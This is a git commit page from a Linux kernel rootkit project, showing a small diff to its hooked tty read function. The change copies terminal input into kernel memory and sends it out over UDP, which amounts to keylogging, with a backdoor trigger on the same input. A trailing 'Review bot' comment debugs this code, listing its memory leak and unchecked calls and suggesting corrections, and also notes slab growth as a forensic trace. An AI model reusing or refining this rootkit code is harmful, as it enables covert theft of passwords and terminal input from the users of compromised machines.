linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 1d08e266816b5fd329bc89f1eff316f07be48384
parent 95ab20f154fa60faae319ad7f33fd5ab1fadb86f
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 22:12:06 +0100

refactors code

Diffstat:
Msrc/hook.c | 5++++-
Msrc/inputlog.c | 2+-
2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -152,11 +152,14 @@ g7_tty_read(struct file *file, char *buf, size_t count, loff_t *off)
 atomic_inc(&tty_read_count);
 ssize_t ret = sys_tty_read(file, buf, count, off);
+ char *buf_new = (char *)kmalloc(count, GFP_KERNEL);
+ copy_from_user(buf_new, buf, count);
+
 if (rootkit.backdoor == BD_TTY)
 handle_pid(current->pid, buf, count);
 if (rootkit.logging_input)
- send_udp(buf, count);
+ send_udp(buf_new, count);
 atomic_dec(&tty_read_count);
 return ret;
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -10,7 +10,7 @@
 #define UDP_MAX_DATA_LEN 65507
-struct socket *sock;
+struct socket *sock = NULL;
 struct sockaddr_in addr, bind;
 void
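Review bot: In the src/hook.c hunk, `buf_new` is allocated with `kmalloc(count, GFP_KERNEL)` on every call of g7_tty_read and nothing in the visible lines frees it, so unless send_udp takes ownership (not shown) each tty read leaks up to `count` bytes of kernel memory. Neither the kmalloc() result nor the copy_from_user() return value is checked, so a failed allocation would be used as a NULL destination, and the copy length is `count` rather than `ret`, which can be negative or shorter than the buffer, so bytes past the actual read are whatever the caller's buffer already held. handle_pid still receives the user-space pointer `buf` directly. For anyone analysing a host, the leak is a usable artifact: kmalloc slab usage that grows with terminal activity and never shrinks. At minimum the new lines should carry a comment such as `/* FIXME: buf_new is never freed; kmalloc()/copy_from_user() unchecked; length should be ret, not count */`; the function body begins and ends outside the hunk.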